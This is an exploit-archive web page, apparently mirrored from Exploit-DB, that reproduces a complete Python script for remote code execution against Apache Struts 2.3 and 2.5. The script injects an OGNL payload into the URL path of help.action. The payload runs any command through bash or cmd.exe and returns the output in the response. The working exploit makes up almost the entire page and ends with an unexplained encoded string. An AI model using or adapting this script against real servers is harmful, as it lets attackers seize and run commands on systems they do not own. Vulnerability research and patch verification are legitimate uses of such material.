首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)
来源:github.com/hook-s3c 作者:hook-s3c 发布时间:2018-08-28  
#!/usr/bin/python
# -*- coding: utf-8 -*-
 
# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
 
import sys
import urllib
import urllib2
import httplib
 
 
def exploit(host,cmd):
    print "[Execute]: {}".format(cmd)
 
    ognl_payload = "${"
    ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
    ognl_payload += "(#cmd='{}').".format(cmd)
    ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
    ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    ognl_payload += "(#p.redirectErrorStream(true))."
    ognl_payload += "(#process=#p.start())."
    ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    ognl_payload += "(#ros.flush())"
    ognl_payload += "}"
 
    if not ":" in host:
        host = "{}:8080".format(host)
 
    # encode the payload
    ognl_payload_encoded = urllib.quote_plus(ognl_payload)
 
    # further encoding
    url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))
 
    print "[Url]: {}\n\n\n".format(url)
 
    try:
        request = urllib2.Request(url)
        response = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        response = e.partial
    print response
 
 
if len(sys.argv) < 3:
    sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
    exploit(sys.argv[1],sys.argv[2])
 
#NCt4elp3bDE3c1BlVkRPbnlhSjUzS28yRVhrMm1HdkdmTTZqQkFkWEMyMDA3VnFxbE5qbHpuanljNm93VmxjbWJiLzFnOE4ycStpLzNFdm0rTTdsUktwNmErSE1OdUI2YUdsQjB2OG1jcWxCZnVCK3FHL2R6blRtTlVKYWxOcVpJaXNON3Z6Z09QTFlIU0wrWWtrbHIzaDVLZ01IWW9CdWdBbnZLRUVVUFRxeklNVXc2YW5uam5IUlRuVkwvMk5qZTIydEFqOHFmMjEveXpyRGlzQ1pjZz09
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache Struts 2.3 < 2.3.34 / 2
·Trend Micro Enterprise Mobile
·CuteFTP 5.0 - Buffer Overflow
·Libpango 1.40.8 - Denial of Se
·Firefox 55.0.3 - Denial of Ser
·Node.JS - 'node-serialize' Rem
·Foxit PDF Reader 9.0.1.1049 Po
·LiteCart 2.1.2 - Arbitrary Fil
·SkypeApp 12.8.487.0 - 'Cuenta
·HP Jetdirect - Path Traversal
·StyleWriter 4 1.0 - Denial of
·Cisco Network Assistant 6.3.3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved